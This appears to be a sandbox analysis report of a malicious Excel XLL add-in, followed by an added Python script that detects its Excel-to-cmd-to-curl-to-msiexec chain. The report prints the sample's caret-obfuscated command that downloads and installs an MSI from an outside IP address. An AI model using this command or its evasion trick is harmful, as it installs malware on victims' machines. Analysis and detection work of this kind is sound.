Analysis
max time kernel: 169s
max time network: 200s
platform: windows10-2004_x64
resource: win10v2004-20230915-en
resource tags: arch:x64, arch:x86, image:win10v2004-20230915-en, locale:en-us, os:windows10-2004-x64, system
submitted: 11/10/2023, 14:04
Static task: static1
Behavioral task: behavioral1
  Sample: a11bd2bde079c17dc7b6793404f812830e99af2883f33ee49c01bc8c85751d50_JC.xll
  Resource: win7-20230831-en
Behavioral task: behavioral2
  Sample: a11bd2bde079c17dc7b6793404f812830e99af2883f33ee49c01bc8c85751d50_JC.xll
  Resource: win10v2004-20230915-en
General
Target: a11bd2bde079c17dc7b6793404f812830e99af2883f33ee49c01bc8c85751d50_JC.xll
Size: 12KB
MD5: ad86b0520d48a0b530915850244f196b
SHA1: 2d28250d44de5ce82ded47bfb29a8ae6353a3fa4
SHA256: a11bd2bde079c17dc7b6793404f812830e99af2883f33ee49c01bc8c85751d50
SHA512: 138934773d669a60900a82ee011f781576dc82275b4c62e696472e1d5890c2b155bf60ecab4eefc1345d4c42fe125078013ee242b8581f28ad735cb288cb1a39
SSDEEP: 192:uU5z9iLjq2pJk+/qcJklyJOEd8LsWGQwrgAh:3z9AbJH/IwJOs3/QwrgC
Malware Config
Extracted
Signatures

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro. In this run neither is required: the parent is EXCEL.EXE and the submitted file is an .xll, an Excel add-in that is a native DLL executed inside the Excel process once the add-in is allowed to load, so it can call CreateProcess directly.
  description | pid | pid_target | Process | procid_target
  Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 216 | 1776 | cmd.exe | 17

Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence. The querying process here is cmd.exe, not code supplied by the add-in, and this key is read during ordinary locale initialisation; on its own it is low-confidence evidence of geofencing.
  description | ioc | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation | cmd.exe

Loads dropped DLL (2 IoCs)
The loaded module is the submitted .xll itself (see Downloads); an XLL is a DLL that Excel loads with LoadLibrary and then calls into.
  pid | Process
  1776 | EXCEL.EXE
  1776 | EXCEL.EXE

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments. Because the add-in runs inside EXCEL.EXE, these reads cannot be separated from Office's own startup and telemetry reads by process attribution alone.
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EXCEL.EXE

Delays execution with timeout.exe (1 IoC)
This is the timeout 10 step of the cmd.exe one-liner: a ten-second pause between the curl download and the msiexec install.
  pid | Process
  5048 | timeout.exe

Enumerates system info in registry (2 TTPs, 3 IoCs)
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | EXCEL.EXE

Modifies registry class (1 IoC)
  description | ioc | Process
  Key created | \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings | cmd.exe

Suspicious behavior: AddClipboardFormatListener (1 IoC)
  pid | Process
  1776 | EXCEL.EXE

Suspicious use of AdjustPrivilegeToken (2 IoCs)
Both privileges are ones msiexec.exe enables for an ordinary install.
  description | pid | Process
  Token: SeShutdownPrivilege | 3584 | msiexec.exe
  Token: SeIncreaseQuotaPrivilege | 3584 | msiexec.exe

Suspicious use of FindShellTrayWindow (4 IoCs)
  pid | Process
  1776 | EXCEL.EXE
  1776 | EXCEL.EXE
  3584 | msiexec.exe
  3584 | msiexec.exe

Suspicious use of SetWindowsHookEx (12 IoCs)
  pid | Process
  1776 | EXCEL.EXE (12 identical entries)

Suspicious use of WriteProcessMemory (8 IoCs)
Every pair below is a parent writing into a child it has just created, matching the process tree; none is a write into an unrelated process.
  description | pid | Process | procid_target
  PID 1776 wrote to memory of 216 | 1776 | EXCEL.EXE | 88
  PID 1776 wrote to memory of 216 | 1776 | EXCEL.EXE | 88
  PID 216 wrote to memory of 4672 | 216 | cmd.exe | 90
  PID 216 wrote to memory of 4672 | 216 | cmd.exe | 90
  PID 216 wrote to memory of 5048 | 216 | cmd.exe | 91
  PID 216 wrote to memory of 5048 | 216 | cmd.exe | 91
  PID 216 wrote to memory of 3584 | 216 | cmd.exe | 100
  PID 216 wrote to memory of 3584 | 216 | cmd.exe | 100
Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE (PID 1776)
  "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\a11bd2bde079c17dc7b6793404f812830e99af2883f33ee49c01bc8c85751d50_JC.xll"
  - Loads dropped DLL
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

  \??\c:\windows\system32\cmd.exe (PID 216, parent 1776)
    c:\windows\system32\cmd.exe /c c^url -o c:\users\public\1.msi http://51.195.49.233/dGp9oe/rAoeU0&&timeout 10&&c:\users\public\1.msi
    - Process spawned unexpected child process
    - Checks computer location settings
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    Two details of this one-liner matter for detection. The caret in c^url is cmd.exe's escape character and is stripped before the token is executed, so the child is an ordinary curl.exe while a literal search for "curl" in the parent's command line finds nothing. The last element, c:\users\public\1.msi, is a data file rather than an executable: cmd.exe launches it through the .msi file association, which is why msiexec.exe /i appears below as a child of cmd.exe without msiexec ever being named on the command line.

    C:\Windows\system32\curl.exe (PID 4672, parent 216)
      curl -o c:\users\public\1.msi http://51.195.49.233/dGp9oe/rAoeU0
      Fetches the second stage into C:\Users\Public, a directory writable by every interactive user, using the curl.exe that ships with Windows 10.

    C:\Windows\system32\timeout.exe (PID 5048, parent 216)
      timeout 10
      - Delays execution with timeout.exe

    C:\Windows\System32\msiexec.exe (PID 3584, parent 216)
      "C:\Windows\System32\msiexec.exe" /i "C:\users\public\1.msi"
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of FindShellTrayWindow
      1.msi itself is not listed under Downloads below, so this page does not show whether the fetch succeeded or what the package contained.
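Detection logic for the chain above, written as an added example; it is not part of the tria.ge report. The five process-creation records are constructed from the PIDs and command lines in the process tree, with assumed Sysmon-style field names (pid, ppid, image, command_line). The rules flag an Office application spawning a shell, a LOLBin name that only appears after cmd.exe caret escapes are removed, an HTTP download into a staging directory, and msiexec installing from such a directory, then walk the parent chain back to the Office process. Rule names, the directory list and the LOLBin token list are assumptions chosen for this example.

```python
"""Detection rules for the Excel -> cmd.exe -> curl -> msiexec chain in this report.

Added example, not tria.ge code. SAMPLE_EVENTS is constructed from the process
tree on the page; the record layout mirrors a Sysmon Event ID 1 style log and is
an assumption of this example.
"""
import re
from dataclasses import dataclass

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
DOWNLOADER_TOKENS = ("curl", "certutil", "bitsadmin")      # assumed LOLBin list
STAGING_DIRS = (r"c:\users\public", r"c:\programdata", r"\appdata\local\temp")


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    command_line: str


def unescape_cmd(cmdline: str) -> str:
    """Undo cmd.exe caret escaping: '^' is dropped and the next character kept,
    so 'c^url' executes as 'curl' and '^^' is a literal '^'."""
    return re.sub(r"\^(.)", r"\1", cmdline)


def basename(path: str) -> str:
    """Last path component, lower-cased; handles NT paths such as \\??\\c:\\..."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].strip('"').lower()


def detect(events: list[ProcEvent]) -> list[tuple[str, int]]:
    """Return (rule, pid) pairs for every event matching a rule."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        name = basename(e.image)
        parent = by_pid.get(e.ppid)
        parent_name = basename(parent.image) if parent else ""
        raw = e.command_line.lower()
        cl = unescape_cmd(e.command_line).lower()

        # Office app starting a shell or script host (the XLL runs native code
        # inside EXCEL.EXE, so no macro is needed for this to happen).
        if parent_name in OFFICE_APPS and name in SHELLS:
            hits.append(("office_spawns_shell", e.pid))

        # A downloader name visible only after caret removal: the operator
        # deliberately hid it from literal command-line matching.
        if any(t in cl and t not in raw for t in DOWNLOADER_TOKENS):
            hits.append(("caret_obfuscation_hides_lolbin", e.pid))

        # Built-in downloader fetching over HTTP into a staging directory.
        if (any(t in cl for t in DOWNLOADER_TOKENS) and "http" in cl
                and any(d in cl for d in STAGING_DIRS)):
            hits.append(("download_to_public_dir", e.pid))

        # msiexec installing a package from a staging directory. In the report,
        # cmd.exe's trailing 'c:\users\public\1.msi' is run via the .msi file
        # association, which is what produces this msiexec /i process.
        if name == "msiexec.exe" and any(d in cl for d in STAGING_DIRS):
            hits.append(("msiexec_from_public_dir", e.pid))
    return hits


def chain_to_office(events: list[ProcEvent], pid: int) -> list[str]:
    """Image basenames from the topmost Office ancestor down to pid, or [] if
    no Office application is an ancestor of pid."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:          # seen guards against PID reuse loops
        seen.add(pid)
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    chain.reverse()                                   # top-down order
    for i, name in enumerate(chain):
        if name in OFFICE_APPS:
            return chain[i:]
    return []


# Constructed from the process tree in this report (same PIDs and command lines).
SAMPLE_EVENTS = [
    ProcEvent(1776, 0, r"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE",
              r'"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" '
              r'"C:\Users\Admin\AppData\Local\Temp\a11bd2bde079c17dc7b6793404f812830e99af2883f33ee49c01bc8c85751d50_JC.xll"'),
    ProcEvent(216, 1776, r"\??\c:\windows\system32\cmd.exe",
              r"c:\windows\system32\cmd.exe /c c^url -o c:\users\public\1.msi "
              r"http://51.195.49.233/dGp9oe/rAoeU0&&timeout 10&&c:\users\public\1.msi"),
    ProcEvent(4672, 216, r"C:\Windows\system32\curl.exe",
              r"curl -o c:\users\public\1.msi http://51.195.49.233/dGp9oe/rAoeU0"),
    ProcEvent(5048, 216, r"C:\Windows\system32\timeout.exe", "timeout 10"),
    ProcEvent(3584, 216, r"C:\Windows\System32\msiexec.exe",
              r'"C:\Windows\System32\msiexec.exe" /i "C:\users\public\1.msi"'),
]

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        chain = " -> ".join(chain_to_office(SAMPLE_EVENTS, pid))
        print(f"{rule:32s} pid={pid:<5d} {chain}")
```

Running the block prints one line per rule hit for PIDs 216, 4672 and 3584, each with its ancestry back to excel.exe; the Excel and timeout.exe events match nothing. The caret rule is kept separate from the download rule on purpose: a plain curl download from Excel is already worth an alert, but a download whose binary name was escaped out of the command line is a stronger signal that someone expected a string-matching detector to be in the way.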
Network
MITRE ATT&CK Enterprise v15
Downloads

C:\Users\Admin\AppData\Local\Temp\a11bd2bde079c17dc7b6793404f812830e99af2883f33ee49c01bc8c85751d50_JC.xll
  Filesize: 12KB
  MD5: ad86b0520d48a0b530915850244f196b
  SHA1: 2d28250d44de5ce82ded47bfb29a8ae6353a3fa4
  SHA256: a11bd2bde079c17dc7b6793404f812830e99af2883f33ee49c01bc8c85751d50
  SHA512: 138934773d669a60900a82ee011f781576dc82275b4c62e696472e1d5890c2b155bf60ecab4eefc1345d4c42fe125078013ee242b8581f28ad735cb288cb1a39